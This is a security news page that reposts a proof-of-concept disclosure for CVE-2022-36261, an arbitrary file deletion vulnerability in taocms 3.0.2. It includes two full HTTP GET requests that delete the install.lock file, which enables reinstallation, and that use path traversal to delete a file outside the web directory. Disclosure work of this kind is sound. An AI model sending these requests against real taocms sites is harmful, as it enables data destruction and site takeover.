Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-36261: cms-pentest/taocms-arbitrary-file-deletion-vulnerability.md at main · chasingboy/cms-pentest

An arbitrary file deletion vulnerability was discovered in taocms 3.0.2, that allows attacker to delete file in server when request url admin.php?action=file&ctrl=del&path=/…/…/…/test.txt

CVE
Open in Source
#vulnerability#web#windows#apple#php#chrome#webkit

Permalink

taocms arbitrary file deletion vulnerability****attack condition: Requires login management

  1. open taocms/include/Model/File.php, found delete file code. The requested url is admin.php?action=file&ctrl=del&path=, receive parameter path.

  2. When taocms is installed, the install.lock file will be generated in the data directory

  3. At this point, when I visit install.php, it reminds me that it is already installed

  4. As requested below, I want to delete the install.lock file

    GET /admin/admin.php?action=file&ctrl=del&path=/data/install.lock HTTP/1.1 Host: 127.0.0.1:9999 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Referer: http://127.0.0.1:9999/admin/admin.php?action=file&ctrl=lists Cookie: PHPSESSID=tnbrlgg1g539t0mjovqs1vrgio Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: frame Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1

  1. Surprisingly it can be removed successfully

  2. I visit install.php again, glad, taocms allows reinstallation

  3. Also, create a new test.txt file in your own user directory

  4. When I execute delete payload,test.txt is deleted

    GET /admin/admin.php?action=file&ctrl=del&path=/…/…/…/test.txt HTTP/1.1 Host: 127.0.0.1:9999 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Referer: http://127.0.0.1:9999/admin/admin.php?action=file&ctrl=lists Cookie: PHPSESSID=tnbrlgg1g539t0mjovqs1vrgio Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: frame Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE